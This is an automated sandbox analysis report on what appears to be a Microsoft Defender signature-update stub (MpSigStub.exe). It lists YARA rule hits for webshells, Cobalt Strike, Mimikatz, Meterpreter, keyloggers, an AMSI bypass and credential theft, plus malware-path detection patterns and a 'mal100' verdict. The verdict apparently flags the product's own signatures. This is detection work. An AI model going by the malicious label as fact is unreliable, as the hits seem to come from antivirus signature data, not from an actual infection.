Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18314653568.00000138BCAC3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp, type: MEMORY	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10

Jump to behavior

Source: MpAsDesc.dll.mui18.44.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: mpuxagent.dll.mui6.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.44.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.44.dr	Static PE information: No import functions for PE file found
Source: mpavbase.vdm.38.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.37.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.37.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.44.dr	Static PE information: No import functions for PE file found
Source: mpasbase.vdm.38.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.44.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\wevtutil.exe

Process token adjusted: Security

Jump to behavior

Source: mpasdlta.vdm.37.dr	Static PE information: Section: .rsrc ZLIB complexity 0.998618847943
Source: mpavdlta.vdm.37.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996141098485

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.mine.winVBS@21/230@1/2

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57E1AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError,

45_2_00007FF7B57E1AE0

Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: ,AD:\baixa\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: "\Mom\Knamemom.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: MyMoney.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: \pekalongan.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: vD:\virustrojan\harpotinfeksiexe\harpotinfeksiexe\SERVER.VBP
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: ,'Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: \\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: R\baixando5link\baixando5link\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: X\D@nBtR270414\version final\DanBtR270414.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: .+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: 2Daum Watch\HitControl.vbp
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: 0+.+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: .+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: 0.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: @*\AY:\zeus\downloadersource\My_Crypter_vbcrypter\vbcrypter\newStubMy\myprog.vbp
